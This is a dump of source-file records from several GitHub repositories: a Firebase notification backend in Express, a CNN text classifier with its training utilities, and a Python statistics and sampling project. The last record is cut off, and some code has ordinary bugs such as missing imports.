"repo_name": "bradley101/blackpearl-backend",
"src_encoding": "UTF-8",
"text": "### Steps to run blackpearl-backend\n```\ngit clone https://github.com/bradley101/blackpearl-backend.git\ncd blackpearl-backend\n\n# Copy your firebase config file to the working directory\ncp ~/config.json .\n\nnpm i\nnpm run main\n```\n\nNow `POST /notify` to `http://localhost:3443` with the data params.\n\nOr \n\nImport `db_helper.py` into your Python 2.x working directory (Install `requests` module first - `python -m install requests`)\n```\nfrom db_helper import sendNotification\n\nsendNotification(\"Some msg\", \"1\", 89987532343223, \"4\")\n```\n\nThe notification will be sent to the app users.\n"
},
{
"alpha_fraction": 0.5796344876289368,
"alphanum_fraction": 0.5926892757415771,
"avg_line_length": 24.55555534362793,
"blob_id": "c36c8f484370f74160a5dc851438c6e516d34680",
"content_id": "2e17e3dac0fc3e9cf5d854c4a375470d639325bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1149,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 45,
"path": "/index.js",
"repo_name": "bradley101/blackpearl-backend",
"src_encoding": "UTF-8",
"text": "let admin = require('firebase-admin')\nconst { getFirestore, Timestamp, FieldValue } = require('firebase-admin/firestore');\nconst express = require('express');\nconst app = express();\n\nvar serviceAccount = require(\"./config.json\");\nadmin.initializeApp({\n credential: admin.credential.cert(serviceAccount),\n databaseURL: \"https://blackpearl-10.firebaseio.com\"\n});\n\nlet db = getFirestore();\napp.use(express.json());\napp.get('/', async (req, res) => {\n res.status(200).send(\"Done!\");\n});\n\nlet fcm = admin.messaging();\n\nlet persist = async data => {\n if (data.message && data.inductId && data.timestamp && data.severity) {\n await db.collection('test-collection').add(data);\n await fcm.sendToTopic(\"notify\", {\n data: {\n data: JSON.stringify(data)\n }\n });\n console.log('Sent to topic');\n }\n};\n\napp.post('/notify', async (req, res) => {\n try {\n data = req.body;\n console.log(data);\n persist(data);\n res.status(200).send({\"msg\": \"Sent successfully.\"});\n } catch (error) {\n res.status(500).send(error)\n }\n \n \n})\n\napp.listen(3443);"
}
] | 3 |
oscar-defelice/TextClassifierModels
|
https://github.com/oscar-defelice/TextClassifierModels
|
df0124c97618f0da4981cdf597850de48d72d148
|
90fc12acee4a320a55b5d25cca119495733a5b6f
|
e958198efdb5d603876e9cafd91d31885eda360a
|
refs/heads/main
| 2023-01-12T23:53:13.267350 | 2020-11-17T09:51:30 | 2020-11-17T09:51:30 | 305,735,677 | 2 | 0 |
Apache-2.0
| 2020-10-20T14:30:54 | 2020-11-07T11:18:07 | 2020-11-17T09:51:31 |
Jupyter Notebook
|
[
{
"alpha_fraction": 0.6909279823303223,
"alphanum_fraction": 0.6961268782615662,
"avg_line_length": 33.97272872924805,
"blob_id": "267d8817283f7ba7c941f901a293c33050aa6e15",
"content_id": "76945682bb4bed4558fa4bbee626f07e441a9dd3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3848,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 110,
"path": "/CNN/train.py",
"repo_name": "oscar-defelice/TextClassifierModels",
"src_encoding": "UTF-8",
"text": "###\n### train.py\n###\n### Created by Oscar de Felice on 23/10/2020.\n### Copyright © 2020 Oscar de Felice.\n###\n### This program is free software: you can redistribute it and/or modify\n### it under the terms of the GNU General Public License as published by\n### the Free Software Foundation, either version 3 of the License, or\n### (at your option) any later version.\n###\n### This program is distributed in the hope that it will be useful,\n### but WITHOUT ANY WARRANTY; without even the implied warranty of\n### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n### GNU General Public License for more details.\n###\n### You should have received a copy of the GNU General Public License\n### along with this program. If not, see <http://www.gnu.org/licenses/>.\n###\n########################################################################\n###\n### train.py\n### This module contains the script to train the model via CLI.\n\"\"\"\n To train the model this type in a command line prompt\n the command\n\n python3 -m train [-h] [-c CONFIG]\n\n where CONFIG is the yaml file path containing configuration variables.\n\"\"\"\n\nimport argparse\nfrom model import buildModel\nfrom utils import getTokeniser, loadConfig, loadData, splitData, tokenise, printReport\n\n# let user feed in 1 parameter, the configuration file\nparser = argparse.ArgumentParser()\nparser.add_argument('-c', '--config', type=str, dest='config',\n help='path of the configuration file')\nargs = parser.parse_args()\nconfigFile = args.config\n\n## load configuration and store it in a dictionary\nconfig = loadConfig(configFile)\n\n## variables\n# path of csv file containing data\ninput_data = config['dataset']['file']['path']\n# split mode (random or fixed) and value (test_rate or validation column in df)\nsplit_mode = config['trn_val_splits']['type']\nsplit_value = config['trn_val_splits']['value']\n# random state seed for pseudorandom processes\nrandom_state = config['random_state']\n# name of the column containing text data\ntext_col = config['input_features']['text']\n# name of the column containing labels\nlabels = config['input_features']['labels']\n# tokeniser object\ntokeniser_conf = config['tokeniser']['tokeniser']\ntokeniser = getTokeniser(tokeniser_conf)\n# max sequence length\nmax_len = config['tokeniser']['max_seq_length']\n# pad to max_seq_length\npad = config['tokeniser']['pad']\n# embedding dimension\nembedding_dim = config['module']['embedding_dim']\n# dropout rate\ndropout_rate = config['module']['dropout_rate']\n# batch size\nbatch_size = config['training']['batch_size']\n# number of epochs\nn_epochs = config['training']['epochs']\n# learning rate\nlearning_rate = config['training']['lr']\n# output file for the report\noutfile = config['output']['path']\n\n\n## load data\ndf, n_classes = loadData(input_data, labels)\n\n## train, test split\ndf_train, df_test = splitData(df, split_mode, split_value, random_state)\n\n## text-to-sequence encoding\nX_train, vocab_size = tokenise(tokeniser, df_train, text_col, max_len,\n padding = pad, mode = 'train')\nX_test = tokenise(tokeniser, df_test, text_col, max_len, padding = pad,\n mode = 'test')\n\n## convert labels to one-hot encoder\ny_train = encodeLabels(df_train, labels)\ny_test = encodeLabels(df_test, labels)\n\n## convert to tensorflow datasets\ntrain_dataset = tf.data.Dataset.from_tensor_slices((X_train, y_train))\ntest_dataset = tf.data.Dataset.from_tensor_slices((X_test, y_test))\nds_train = train_dataset.shuffle(10000).batch(batch_size)\nds_test = test_dataset.batch(batch_size)\n\n\n## define deep learning model calssifier\nmodel = buildModel(vocab_size, embedding_dim, max_len, n_classes, dropout_rate)\n\n## train the model\nmodel.fit(ds_train, epochs=n_epochs, validation_data=ds_test)\n\nprintReport(model, X_test, y_test, target_names = df[labels].unique(),\n outfile=outfile)\n"
},
{
"alpha_fraction": 0.5976260900497437,
"alphanum_fraction": 0.6068249344825745,
"avg_line_length": 53.35483932495117,
"blob_id": "d62f680f7359c8b95d0faba38009d8e43d33bc94",
"content_id": "a63d8ee6d48629e3bb7a61260d9f97380ebfccbf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3370,
"license_type": "permissive",
"max_line_length": 279,
"num_lines": 62,
"path": "/README.md",
"repo_name": "oscar-defelice/TextClassifierModels",
"src_encoding": "UTF-8",
"text": "# TextClassifierModels\nRepository containing the code to develop a Neural based text classifier.\n\n## Models\n\nIn the repository there are various models implemented for text classification.\nIn order to access a _ready-to-explore_ version one can have a look at the notebooks provided.\nModels are quite heavy and memory consuming, so it is really advised to use a GPU machine to run their training tasks.\n\n### Available models\n\n\n<table style=\"max-width:100%;table-layout:auto;\">\n <tr style=\"text-align:center;\">\n <th>Model</th>\n <th>Demo</th>\n <th>Details</th>\n <th>CLI</th>\n <th>Accuracy score on AG news dataset</th>\n </tr>\n <!-- -->\n <!-- -->\n <!-- ** CNN TextClassifier -->\n <tr>\n <!-- Model -->\n <td rowspan=\"3\"><b><a style=\"white-space:nowrap; display:inline-block;\" href=\"https://github.com/oscar-defelice/TextClassifierModels/tree/main/CNN\"><div style='vertical-align:middle; display:inline;'>CNN TextClassifier</div></a></b></td>\n <!-- Colab badge -->\n <td><a href=\"https://colab.research.google.com/drive/1nh9QvDu3YgceQ2PH5DZz3pnYbGljtpIF?usp=sharing\">\n <img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a></td>\n <!-- Description -->\n <td rowspan=\"3\">Classify texts with labels from the <a href=\"http://groups.di.unipi.it/~gulli/AG_corpus_of_news_articles.html\">AG news database</a> making use of a convolutional neural network.</td>\n <!-- Command Line key -->\n <td rowspan=\"3\"><code>python3 -m train -c config.yaml</code></td>\n <td rowspan=\"3\"> 90.71 </td>\n </tr>\n <tr>\n <!-- ** WebApp Link -->\n <td><a href=\"https://oscar-defelice.github.io/txt-clf-api.github.io/\">webApp</a></td>\n <tr>\n <!-- ** Link to source code -->\n <td><a href=\"https://github.com/oscar-defelice/TextClassifierModels/tree/main/CNN\">source</a></td>\n <!-- -->\n <!-- ** BERT TextClassifier -->\n <tr>\n <!-- Model -->\n <td rowspan=\"3\"><b><a style=\"white-space:nowrap; display:inline-block;\" href=\"https://github.com/oscar-defelice/TextClassifierModels/tree/main/BERT\"><div style='vertical-align:middle; display:inline;'>BERT TextClassifier</div></a></b></td>\n <!-- Colab badge -->\n <td><a href=\"https://colab.research.google.com/drive/1VSYpdUQ-v9SdBmOLeet8fPv3mkYRhGYf?usp=sharing\">\n <img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a></td>\n <!-- Description -->\n <td rowspan=\"3\">Classify texts with labels from the <a href=\"http://groups.di.unipi.it/~gulli/AG_corpus_of_news_articles.html\">AG news database</a> making use of an attention model, based on <a href=\"https://en.wikipedia.org/wiki/BERT_(language_model)\">BERT</a>.</td>\n <!-- Command Line key -->\n <td rowspan=\"3\"><code>python3 -m train -c config.yaml</code></td>\n <td rowspan=\"3\"> 93.95 </td>\n </tr>\n <tr>\n <!-- ** WebApp Link -->\n <td><a href=\"https://oscar-defelice.github.io/txt-clf-api.github.io/\">webApp</a></td>\n <tr>\n <!-- ** Link to source code -->\n <td><a href=\"https://github.com/oscar-defelice/TextClassifierModels/tree/main/BERT\">source</a></td>\n</table>\n"
},
{
"alpha_fraction": 0.5790202021598816,
"alphanum_fraction": 0.590091347694397,
"avg_line_length": 32.766353607177734,
"blob_id": "0d2d450ae7dafe41ec9db869f0df5d424cfce2bd",
"content_id": "359348624c5bff2a00dc109b67647630f5b5d8a1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3614,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 107,
"path": "/CNN/model.py",
"repo_name": "oscar-defelice/TextClassifierModels",
"src_encoding": "UTF-8",
"text": "###\n### model.py\n###\n### Created by Oscar de Felice on 23/10/2020.\n### Copyright © 2020 Oscar de Felice.\n###\n### This program is free software: you can redistribute it and/or modify\n### it under the terms of the GNU General Public License as published by\n### the Free Software Foundation, either version 3 of the License, or\n### (at your option) any later version.\n###\n### This program is distributed in the hope that it will be useful,\n### but WITHOUT ANY WARRANTY; without even the implied warranty of\n### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n### GNU General Public License for more details.\n###\n### You should have received a copy of the GNU General Public License\n### along with this program. If not, see <http://www.gnu.org/licenses/>.\n###\n########################################################################\n###\n### model.py\n### This module contains the model definition\n\"\"\"\n CNN Model for text classification.\n\"\"\"\n\n# import libraries\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Activation, Conv1D, Dense, Dropout, Embedding, GlobalMaxPool1D, MaxPool1D\n\n# default values\noptimizer = tf.keras.optimizers.Adam()\nloss = tf.keras.losses.CategoricalCrossentropy()\n\n\ndef buildModel( vocab_size,\n emb_dim,\n max_len,\n num_classes,\n dropout_rate,\n optimizer = optimizer,\n loss = loss,\n name = 'CNN_for_text_classification'):\n \"\"\"\n Function to build a CNN model for text classification.\n\n Parameters\n ----------\n vocab_size : int\n number of words in the vocabulary.\n\n emb_dim : int\n dimension of the embedding space.\n\n max_len : int\n maximal length of the input sequences.\n\n num_classes : int\n number of unique labels, it is also the number of\n units of the last dense layer.\n\n dropout_rate : int\n dropout hyperparameter, i.e. the probability of dropping\n a given node in the layer.\n dropout_rate = 0 is equivalent to no dropout.\n\n optimizer : optimizer object in Keras\n default : Adam optimizer\n\n loss : loss object in Keras\n default : Categorical Crossentropy\n\n name : str\n name of the model.\n default : 'CNN_for_text_classification'\n\n Return\n ------\n A Keras model object.\n\n \"\"\"\n # build the model\n\n model = Sequential(name = name)\n model.add(Embedding(vocab_size, output_dim = emb_dim, input_length=max_len))\n model.add(Dropout(dropout_rate))\n model.add(Conv1D(50, 3, activation='relu', padding='same', strides=1))\n model.add(MaxPool1D())\n model.add(Dropout(dropout_rate))\n model.add(Conv1D(100, 3, activation='relu', padding='same', strides=1))\n model.add(MaxPool1D())\n model.add(Dropout(dropout_rate))\n model.add(Conv1D(200, 3, activation='relu', padding='same', strides=1))\n model.add(GlobalMaxPool1D())\n model.add(Dropout(dropout_rate))\n model.add(Dense(100))\n model.add(Activation('relu'))\n model.add(Dropout(dropout_rate))\n model.add(Dense(num_classes))\n model.add(Activation('softmax'))\n model.compile(loss=loss, metrics=['acc'], optimizer=optimizer)\n print(model.summary())\n\n return model\n"
},
{
"alpha_fraction": 0.5370938777923584,
"alphanum_fraction": 0.5391046404838562,
"avg_line_length": 31.139455795288086,
"blob_id": "da01e6d471361abd909a78a3f90f5f98884fefd9",
"content_id": "f80ba39e1dc5c230a403dfcf426f6c9212062815",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9450,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 294,
"path": "/CNN/utils.py",
"repo_name": "oscar-defelice/TextClassifierModels",
"src_encoding": "UTF-8",
"text": "###\n### utils.py\n###\n### Created by Oscar de Felice on 23/10/2020.\n### Copyright © 2020 Oscar de Felice.\n###\n### This program is free software: you can redistribute it and/or modify\n### it under the terms of the GNU General Public License as published by\n### the Free Software Foundation, either version 3 of the License, or\n### (at your option) any later version.\n###\n### This program is distributed in the hope that it will be useful,\n### but WITHOUT ANY WARRANTY; without even the implied warranty of\n### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n### GNU General Public License for more details.\n###\n### You should have received a copy of the GNU General Public License\n### along with this program. If not, see <http://www.gnu.org/licenses/>.\n###\n########################################################################\n###\n### utils.py\n### This module contains helper functions for train and model.\n\n# import libraries\nimport tensorflow_datasets as tfds\nimport pandas as pd\npd.options.mode.chained_assignment = None # default='warn'\nfrom sklearn.metrics import classification_report\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nimport yaml\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils import to_categorical\n\nimport re\nimport string\nfrom datetime import datetime\n\nimport nltk\nnltk.download('punkt')\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\n\ndef getTokeniser(tokeniser_conf):\n if tokeniser_conf == 'keras':\n from keras.preprocessing.text import Tokenizer\n return Tokenizer(lower = True)\n else:\n raise ValueError(f'{tokeniser_conf} is not a valid option for tokeniser')\n\ndef loadConfig(configFile):\n with open(configFile, 'r') as stream:\n try:\n return yaml.safe_load(stream)\n except yaml.YAMLError as error:\n print(error)\n\ndef loadData(data, label_col, **kwargs):\n \"\"\"\n Function to download and store data into a dataset.\n\n Parameters\n ----------\n data : str\n path to data file (csv).\n\n label_col : str\n name of the column containing labels.\n\n Returns\n -------\n pandas dataframe containing data.\n n_classes : int\n nuber of classes for text classification.\n \"\"\"\n df = pd.read_csv(data, **kwargs)\n return df, len(df[label_col].unique())\n\ndef splitData( df, split_mode, split_value, random_state = None):\n \"\"\"\n Function to split data into train and validation sets.\n\n Parameters\n ----------\n df : pandas dataframe\n dataframe to be splitted\n\n split_mode : str\n string indicating whether the split is random or\n based on the value in a specific column\n\n split_value : float or str\n if split is random, which fraction of df has to be\n taken as validation set.\n if split is value based, the name of the column to\n look at.\n\n random_state : int\n seed to recover reproducibility in pseudorandom\n operations.\n\n Return\n ------\n df_train, df_test : pandas dataframes\n pandas dataframes containing train and test\n data respectively.\n \"\"\"\n\n if split_mode == 'random':\n df_train, df_test = train_test_split( df, test_size=split_value,\n random_state=random_state)\n elif split_mode == 'fixed':\n test_mask = df[split_value] == 'validation'\n df_test = df[test_mask]\n df_train = df[~test_mask]\n\n else:\n raise ValueError(f'{split_mode} is not a valid option for split_mode.')\n\n return df_train, df_test\n\ndef remove_punc(text):\n text = re.sub('\\[.*?\\]', '', text)\n text = re.sub('https?://\\S+|www\\.\\S+', '', text)\n text = re.sub('<.*?>+', '', text)\n text = re.sub('[%s]' % re.escape(string.punctuation), '', text)\n text = re.sub('\\n', '', text)\n text = re.sub('\\w*\\d\\w*', '', text)\n return text\n\ndef remove_stopwords(text):\n \"\"\"\n Functions to remove stopwords.\n \"\"\"\n list1 = [word for word in text.split() if\n word not in stopwords.words('english')]\n\n return \" \".join(list1)\n\ndef preprocess( df, text_col):\n \"\"\"\n Function to preprocess text data.\n\n Parameters\n ----------\n df : pandas dataframe\n dataframe containing text data.\n\n text_col : str\n column name containing text to be transformed.\n\n Returns\n -------\n NoneType, it updates df[text_col] with stopwords and punctuation\n removed.\n \"\"\"\n\n df[text_col] = df[text_col].apply(lambda x: remove_punc(x))\n df[text_col] = df[text_col].apply(lambda x: remove_stopwords(x))\n\n\ndef tokenise( tokeniser,\n df,\n text_col,\n max_len,\n padding = True,\n mode = 'train'):\n \"\"\"\n Function to operate the text-to-sequence conversion.\n\n Parameters\n ----------\n tokeniser : tokeniser object\n\n df : pandas dataframe\n dataframe containing text data in a column.\n\n text_col : str\n name of the column containing text to tokenise.\n\n max_len : int\n maximal lenght of the tokenised sequence.\n Texts in text_col longer than max_len are truncated.\n Shorter ones are padded with special token.\n\n padding : bool\n Set to True to add pad tokens to sequences shorter than\n max_len.\n default : True\n\n mode : str\n train mode indicates to operate the tokeniser fit on\n sequences.\n test mode just convert text to sequences.\n\n Return\n ------\n numpy array of shape (len(df), max_len)\n This contains a numerical sequence per row corresponding to the\n encoding of each df[text_col] row.\n In mode train returns also the vocab_size.\n \"\"\"\n preprocess(df, text_col)\n\n if mode == 'train':\n tokeniser = tokeniser\n tokeniser.fit_on_texts(df[text_col])\n vocab_size = len(tokeniser.word_index) + 1\n elif mode == 'test':\n tokeniser = tokeniser\n else:\n raise ValueError(f'{mode} is not a valid option.')\n\n tokenised_texts = tokeniser.texts_to_sequences(df[text_col])\n if padding:\n tokenised_texts = pad_sequences(tokenised_texts, maxlen=max_len)\n\n if mode == 'train':\n return tokenised_texts, vocab_size\n else:\n return tokenised_texts\n\ndef encodeLabels(df, label_col, mode):\n \"\"\"\n Function to apply the one-hot encoder to labels.\n\n Parameters\n ----------\n df : pandas dataframe\n dataframe containing data.\n\n label_col : str\n name of the column containing labels.\n \"\"\"\n\n encoded_labels = preprocessing.LabelEncoder()\n\n y = encoded_labels.fit_transform(df[label_col])\n \n return to_categorical(y)\n\ndef printReport(model, x_test, y_test,\n target_names = None,\n num_digits = 4,\n outfile = None):\n \"\"\"\n Function to print classification report.\n\n Parameters\n ----------\n y_true : list of float\n the test labels.\n\n y_predict : list of float\n model predictions for labels.\n\n label_names : list of str\n list of names for labels.\n If None there will appear numbers (indices\n of label list).\n default : None\n\n num_digits : int\n the number of digits to show in the report.\n default : 4\n\n outfile : str or NoneType\n A path to a file .txt to be filled with classification\n report.\n If None, prints on screen.\n default : None\n\n \"\"\"\n y_pred = to_categorical(np.argmax(model.predict(X_test), axis=1))\n\n if outfile != None:\n original_stdout = sys.stdout # Save a reference to the original standard output\n\n filename = outfile + datetime.now() + '.txt'\n\n with open(filename, 'w') as f:\n sys.stdout = f # Change the standard output to the file we created.\n print(classification_report(y_test, y_pred,\n target_names=label_names,\n digits = num_digits))\n\n sys.stdout = original_stdout # Reset the standard output to its\n # original value.\n\n else:\n print(classification_report(y_test, y_pred, target_names=label_names,\n digits = num_digits))\n"
},
{
"alpha_fraction": 0.8256880640983582,
"alphanum_fraction": 0.853210985660553,
"avg_line_length": 8.909090995788574,
"blob_id": "ed489fa5fed5e56c33d09d72830f2a6476f243f1",
"content_id": "b272c155db4afd2307f2ab79c6769aba98276ba5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 109,
"license_type": "permissive",
"max_line_length": 26,
"num_lines": 11,
"path": "/CNN/requirements.txt",
"repo_name": "oscar-defelice/TextClassifierModels",
"src_encoding": "UTF-8",
"text": "keras\nnltk\nnumpy\npandas\nregex\nsklearn\ntensorflow\ntensorflow-datasets==4.0.1\ntensorflowjs\ntransformers\npyyaml\n"
}
] | 5 |
Duttp1998/IS218Project
|
https://github.com/Duttp1998/IS218Project
|
ecb265a1520e0b82ab141cea357e94ef9255524e
|
0a7520b62d196a7c5625f8bc068d44c12eeeaa12
|
50359eb4ece79e65f671b99196af814cd1fd3ec8
|
refs/heads/master
| 2021-02-13T20:11:25.862209 | 2020-03-14T02:34:17 | 2020-03-14T02:34:17 | 244,728,736 | 0 | 0 | null | 2020-03-03T19:55:22 | 2020-03-14T02:08:28 | 2020-03-14T02:13:02 |
Python
|
[
{
"alpha_fraction": 0.6696832776069641,
"alphanum_fraction": 0.6764705777168274,
"avg_line_length": 28.46666717529297,
"blob_id": "a4934f969830cb2cd9ab1d1479c31a98aed2dc0f",
"content_id": "346c42e86c4402b60ffd631889af80f3030308d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 442,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 15,
"path": "/PopulationSamplingfunctions/Crochran.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "from Statistics.Zscore import Zscore\nfrom PopulationSamplingfunctions.Margin_error import MarginError\nfrom Statistics.PopulationProportion import PopulationProportion\n\nclass Cochran:\n @staticmethod\n def cochran(data):\n z_s = Zscore.zscore(data)\n p_p = PopulationProportion.proportion(data)\n m_e = MarginError.margin(data)\n q = 1 - p_p\n\n cochran = ((z_s**2) * p_p * q)/(m_e**2)\n\n return cochran\n"
},
{
"alpha_fraction": 0.7027027010917664,
"alphanum_fraction": 0.7027027010917664,
"avg_line_length": 17.66666603088379,
"blob_id": "254937c03163ece80606b77e2a71e9c3309f069d",
"content_id": "2c716ea776d2dd4f8ef580de18b25d0cb5509ca5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 111,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 6,
"path": "/Statistics/Median.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import statistics\n\nclass Median:\n @staticmethod\n def median(data):\n return statistics.median(data)"
},
{
"alpha_fraction": 0.6220472455024719,
"alphanum_fraction": 0.6267716288566589,
"avg_line_length": 30.799999237060547,
"blob_id": "ea77b62e5c971f4c6588ce4f8bafd23f24e2c886",
"content_id": "aa8a0e950227fd596642c2e8b07750925eae662a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 635,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 20,
"path": "/Statistics/SampleCorrelation.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import math\nfrom Statistics.Standarddeviation import Standarddeviation\nfrom Statistics.Mean import Mean\n\nclass Samplecorrelation():\n @staticmethod\n def samplecorrelation(array):\n x = array[0]\n y = array[1]\n meanX = Mean.mean(x)\n meanY = Mean.mean(y)\n numerator = 0\n for index in range(len(x)):\n xdiff = x[index]-meanX\n ydiff = y[index]- meanY\n numerator += xdiff* ydiff\n covariance = numerator/ len(x)\n stdX = Standarddeviation.standarddeviation(x)\n stdY = Standarddeviation.standarddeviation(y)\n return covariance/(stdX*stdY)"
},
{
"alpha_fraction": 0.44871795177459717,
"alphanum_fraction": 0.4583333432674408,
"avg_line_length": 26.363636016845703,
"blob_id": "7ae0a80e5fdd4181112e33b2f92bde9f57d03aef",
"content_id": "3b02e62f8f33f5cec609bfcd3e8892a0235963b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 312,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 11,
"path": "/PopulationSamplingfunctions/Systematic_sampling.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "class SystemicSample:\r\n @staticmethod\r\n def systematicSample(array, n):\r\n result = []\r\n while n > 0:\r\n index = len(array) // n\r\n if index >= len(array):\r\n index -= 1\r\n result.append(array.pop(index))\r\n n -= 1\r\n return result\r\n"
},
{
"alpha_fraction": 0.6679999828338623,
"alphanum_fraction": 0.6679999828338623,
"avg_line_length": 22.809524536132812,
"blob_id": "6fa476e0989adf12beed9fd4348a0df468b21101",
"content_id": "2a36ba7f483e1ddcd995fc0d7e7d17ee5bfbe393",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 500,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 21,
"path": "/Random/Numbers.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import random\n\n\nclass Numbers:\n @staticmethod\n def randINT(lowest, highest):\n return random.randrange(lowest, highest)\n\n @staticmethod\n def randFLT(lowest, highest):\n return random.uniform(lowest, highest)\n\n @staticmethod\n def prandINT(lowest, highest, seed):\n random.seed(seed)\n return random.randrange(lowest, highest)\n\n @staticmethod\n def prandFLT(lowest, highest, seed):\n random.seed(seed)\n return random.uniform(lowest, highest)\n"
},
{
"alpha_fraction": 0.6794871687889099,
"alphanum_fraction": 0.7692307829856873,
"avg_line_length": 30.200000762939453,
"blob_id": "1cb51476994969b95b9298015bbe7d9db1f825a4",
"content_id": "6dae60f1906c1950f230f91d3399f462029eb186",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 5,
"path": "/README.md",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "[](https://travis-ci.org/Duttp1998/IS218Project)\n\n# calculator\n\n# Statistics\n"
},
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7058823704719543,
"avg_line_length": 16,
"blob_id": "53e398fd50ad8446a7cc1402b5ca6a6a79dd82b9",
"content_id": "304bcdb4f64c02d6938fc9fe5ce07e616095146a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 119,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 7,
"path": "/Statistics/Variance.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import statistics\n\n\nclass Variance:\n @staticmethod\n def variance(data):\n return statistics.variance(data)\n"
},
{
"alpha_fraction": 0.614262580871582,
"alphanum_fraction": 0.6191247701644897,
"avg_line_length": 26.045454025268555,
"blob_id": "86afff79b8a7891ef30cd6c9fa28023690cb0d9a",
"content_id": "3eb9e57b37a87954c72e3494bb0f356203db30a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 617,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 22,
"path": "/PopulationSamplingfunctions/Confidence_interval.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "from scipy.stats import sem\r\nfrom scipy.stats import t\r\nfrom Statistics.Mean import Mean\r\n\r\nclass ConfidenceInterval:\r\n @staticmethod\r\n def confidenceIntervalPopulation(confidence, data):\r\n ld = len(data)\r\n mn = Mean.mean(data)\r\n std_er = sem(data)\r\n high = std_er * t.ppf((1 + confidence) / 2, ld - 1)\r\n\r\n start = mn - high\r\n end = mn + high\r\n\r\n return start, end\r\n\r\n @staticmethod\r\n def confidenceIntervalSample(confidence, data):\r\n data = data\r\n cip = ConfidenceInterval.confidenceIntervalPopulation(confidence, data)\r\n return cip\r\n"
},
{
"alpha_fraction": 0.6752136945724487,
"alphanum_fraction": 0.6752136945724487,
"avg_line_length": 22.200000762939453,
"blob_id": "f1cb14a6f4d1a38eacc269e28344062dcbf0eba9",
"content_id": "6e53ff839c677fad6767b3a54a4a838943a23ccb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 5,
"path": "/Statistics/Zscore.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "\nfrom scipy import stats\nclass Zscore():\n @staticmethod\n def zscore(array):\n return stats.zscore(array)\n"
},
{
"alpha_fraction": 0.5186915993690491,
"alphanum_fraction": 0.5747663378715515,
"avg_line_length": 20.5,
"blob_id": "68b8d8aed1ea7fd807985e3f7a0b1a7def9d023f",
"content_id": "b24e083f0c7d3e53f057c91e3e103c8228c5738b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 214,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 10,
"path": "/Statistics/Quartiles.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass Quartiles:\n @staticmethod\n def quartiles(data):\n q1 = np.quantile(data, .25)\n q2 = np.quantile(data, .50)\n q3 = np.quantile(data, .75)\n return q1, q2, q3"
},
{
"alpha_fraction": 0.6831682920455933,
"alphanum_fraction": 0.6831682920455933,
"avg_line_length": 25.545454025268555,
"blob_id": "0fdfef48aa8d5a7445bd08d3f2e7fe0842aa686b",
"content_id": "37da1635fa79c1ba2e3a610256ac02d758f2b58c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 303,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 11,
